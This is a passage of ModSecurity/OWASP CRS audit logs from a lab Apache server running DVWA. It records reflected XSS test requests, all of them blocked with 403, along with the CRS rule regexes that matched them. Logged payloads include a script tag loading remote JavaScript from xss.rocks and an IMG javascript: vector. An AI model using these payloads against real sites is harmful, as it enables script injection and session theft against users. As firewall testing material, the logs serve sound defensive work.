\"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0Kn8AAQEAAAkXs@cAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: <SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0Kn8AAQEAAAkXs@cAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?i)([<\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9c]script[^>\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9e]*[>\\\\\\\\xef\\\\\\\\xbc\\\\\\\\x9e][\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?)\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"91\"] [id \"941110\"] [rev \"2\"] [msg \"XSS Filter - Category 1: Script Tag Vector\"] [data \"Matched Data: <SCRIPT SRC=http://xss.rocks/xss.js> found within ARGS:name: <SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"4\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0Kn8AAQEAAAkXs@cAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?i)<[^\\\\\\\\\\\\\\\\w<>]*(?:[^<>\\\\\\\\\"'\\\\\\\\\\\\\\\\s]*:)?[^\\\\\\\\\\\\\\\\w<>]*(?:\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?c\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?p\\\\\\\\\\\\\\\\W*?t|\\\\\\\\\\\\\\\\W*?f\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?m|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?t\\\\\\\\\\\\\\\\W*?y\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?e|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?v\\\\\\\\\\\\\\\\W*?g|\\\\\\\\\\\\\\\\W*?m\\\\\\\\\\\\\\\\W*?a\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?q\\\\\\\\\\\\\\\\W*?u\\\\\\\\\\\\\\\\W*?e\\\\\\\\\\\\\\\\W*?e|(?:\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?n\\\\\\\\\\\\\\\\W*?k|\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?b\\\\\\\\\\\\\\\\W*?j\\\\\\\\\\\\\\\\W*?e\\\\\\\\ ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: <SCRIPT found within ARGS:name: <SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0Kn8AAQEAAAkXs@cAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 23)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0Kn8AAQEAAAkXs@cAAAAC\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 23 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): NoScript XSS InjectionChecker: HTML Injection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0Kn8AAQEAAAkXs@cAAAAC\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":637,"p2":4001,"p3":0,"p4":0,"p5":233,"sr":28,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:28:45 --0400","transaction_id":"WRc0PX8AAQEAAAkYuE4AAAAD","remote_address":"192.168.75.145","remote_port":56778,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/xss_r/?name=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_r/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"316","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/xss_r/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: <IMG SRC=\\x22javascript:alert('XSS');\\x22>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"192\"] [id \"941140\"] [rev \"3\"] [msg \"XSS Filter - Category 4: Javascript URI Vector\"] [data \"Matched Data: =\\x22javascript: found within ARGS:name: <IMG SRC=\\x22javascript:alert('XSS');\\x22>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)<[^\\\\w<>]*(?:[^<>\\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: <IMG found within ARGS:name: <IMG SRC=\\x22javascript:alert('XSS');\\x22>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i)(?:\\\\W|^)(?:javascript:(?:[\\\\s\\\\S]+[=\\\\\\\\(\\\\[\\\\.<]|[\\\\s\\\\S]*?(?:\\\\bname\\\\b|\\\\[ux]\\\\d))|data:(?:(?:[a-z]\\\\w+\\\\/\\\\w[\\\\w+-]+\\\\w)?[;,]|[\\\\s\\\\S]*?;[\\\\s\\\\S]*?\\\\b(?:base64|charset=)|[\\\\s\\\\S]*?,[\\\\s\\\\S]*?<[\\\\s\\\\S]*?\\\\w[\\\\s\\\\S]*?>))|@\\\\W*?i\\\\W*?m\\\\W*?p\\\\W*? ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"300\"] [id \"941170\"] [rev \"3\"] [msg \"NoScript XSS InjectionChecker: Attribute Injection\"] [data \"Matched Data: \\x22javascript:alert( found within ARGS:name: <IMG SRC=\\x22javascript:alert('XSS');\\x22>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Warning. Pattern match \"(?i:(j|(&#x?0*((74)|(4A)|(106)|(6A));?))([\\\\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&#x?0*((65)|(41)|(97)|(61));?))([\\\\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(v|(&#x?0*((86)|(56)|(118)|(76));?))([\\\\t]|(&((#x?0*(9|(13)|( ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"428\"] [id \"941210\"] [rev \"3\"] [msg \"IE XSS Filters - Attack Detected.\"] [data \"Matched Data: javascript:a found within ARGS:name: <IMG SRC=\\x22javascript:alert('XSS');\\x22>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 33)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 33 - SQLI=0,XSS=30,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): IE XSS Filters - Attack Detected.\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0PX8AAQEAAAkYuE4AAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: connection found within ARGS:name: <IMG SRC=\\\\\\\\x22javascript:alert('XSS');\\\\\\\\x22>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0PX8AAQEAAAkYuE4AAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\\\\\\\\\\\\\b[^>]*?>[\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?|(?:=|U\\\\\\\\\\\\\\\\s*?R\\\\\\\\\\\\\\\\s*?L\\\\\\\\\\\\\\\\s*?\\\\\\\\\\\\\\\\()\\\\\\\\\\\\\\\\s*?[^>]*?\\\\\\\\\\\\\\\\s*?S\\\\\\\\\\\\\\\\s*?C\\\\\\\\\\\\\\\\s*?R\\\\\\\\\\\\\\\\s*?I\\\\\\\\\\\\\\\\s*?P\\\\\\\\\\\\\\\\s*?T\\\\\\\\\\\\\\\\s*?:)\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"192\"] [id \"941140\"] [rev \"3\"] [msg \"XSS Filter - Category 4: Javascript URI Vector\"] [data \"Matched Data: =\\\\\\\\x22javascript: found within ARGS:name: <IMG SRC=\\\\\\\\x22javascript:alert('XSS');\\\\\\\\x22>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0PX8AAQEAAAkYuE4AAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?i)<[^\\\\\\\\\\\\\\\\w<>]*(?:[^<>\\\\\\\\\"'\\\\\\\\\\\\\\\\s]*:)?[^\\\\\\\\\\\\\\\\w<>]*(?:\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?c\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?p\\\\\\\\\\\\\\\\W*?t|\\\\\\\\\\\\\\\\W*?f\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?m|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?t\\\\\\\\\\\\\\\\W*?y\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?e|\\\\\\\\\\\\\\\\W*?s\\\\\\\\\\\\\\\\W*?v\\\\\\\\\\\\\\\\W*?g|\\\\\\\\\\\\\\\\W*?m\\\\\\\\\\\\\\\\W*?a\\\\\\\\\\\\\\\\W*?r\\\\\\\\\\\\\\\\W*?q\\\\\\\\\\\\\\\\W*?u\\\\\\\\\\\\\\\\W*?e\\\\\\\\\\\\\\\\W*?e|(?:\\\\\\\\\\\\\\\\W*?l\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?n\\\\\\\\\\\\\\\\W*?k|\\\\\\\\\\\\\\\\W*?o\\\\\\\\\\\\\\\\W*?b\\\\\\\\\\\\\\\\W*?j\\\\\\\\\\\\\\\\W*?e\\\\\\\\ ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"267\"] [id \"941160\"] [rev \"2\"] [msg \"NoScript XSS InjectionChecker: HTML Injection\"] [data \"Matched Data: <IMG found within ARGS:name: <IMG SRC=\\\\\\\\x22javascript:alert('XSS');\\\\\\\\x22>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0PX8AAQEAAAkYuE4AAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?i)(?:\\\\\\\\\\\\\\\\W|^)(?:javascript:(?:[\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]+[=\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\[\\\\\\\\\\\\\\\\.<]|[\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?(?:\\\\\\\\\\\\\\\\bname\\\\\\\\\\\\\\\\b|\\\\\\\\\\\\\\\\[ux]\\\\\\\\\\\\\\\\d))|data:(?:(?:[a-z]\\\\\\\\\\\\\\\\w+\\\\\\\\\\\\\\\\/\\\\\\\\\\\\\\\\w[\\\\\\\\\\\\\\\\w+-]+\\\\\\\\\\\\\\\\w)?[;,]|[\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?;[\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?\\\\\\\\\\\\\\\\b(?:base64|charset=)|[\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?,[\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?<[\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?\\\\\\\\\\\\\\\\w[\\\\\\\\\\\\\\\\s\\\\\\\\\\\\\\\\S]*?>))|@\\\\\\\\\\\\\\\\W*?i\\\\\\\\\\\\\\\\W*?m\\\\\\\\\\\\\\\\W*?p\\\\\\\\\\\\\\\\W*? ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"300\"] [id \"941170\"] [rev \"3\"] [msg \"NoScript XSS InjectionChecker: Attribute Injection\"] [data \"Matched Data: \\\\\\\\x22javascript:alert( found within ARGS:name: <IMG SRC=\\\\\\\\x22javascript:alert('XSS');\\\\\\\\x22>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0PX8AAQEAAAkYuE4AAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"(?i:(j|(&#x?0*((74)|(4A)|(106)|(6A));?))([\\\\\\\\\\\\\\\\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&#x?0*((65)|(41)|(97)|(61));?))([\\\\\\\\\\\\\\\\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(v|(&#x?0*((86)|(56)|(118)|(76));?))([\\\\\\\\\\\\\\\\t]|(&((#x?0*(9|(13)|( ...\" at ARGS:name. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"428\"] [id \"941210\"] [rev \"3\"] [msg \"IE XSS Filters - Attack Detected.\"] [data \"Matched Data: javascript:a found within ARGS:name: <IMG SRC=\\\\\\\\x22javascript:alert('XSS');\\\\\\\\x22>\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0PX8AAQEAAAkYuE4AAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 33)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0PX8AAQEAAAkYuE4AAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 33 - SQLI=0,XSS=30,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): IE XSS Filters - Attack Detected.\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_r/\"] [unique_id \"WRc0PX8AAQEAAAkYuE4AAAAD\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":613,"p2":3997,"p3":0,"p4":0,"p5":330,"sr":25,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
